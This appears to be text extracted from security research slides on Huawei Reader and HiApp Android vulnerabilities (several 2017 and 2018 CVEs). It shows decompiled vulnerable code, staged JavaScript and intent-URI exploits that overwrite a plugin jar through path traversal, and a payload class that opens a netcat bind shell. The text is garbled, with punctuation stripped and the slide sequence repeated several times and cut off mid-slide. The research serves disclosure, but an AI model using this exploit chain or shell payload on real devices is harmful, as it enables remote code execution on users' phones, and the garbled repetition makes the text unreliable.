Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
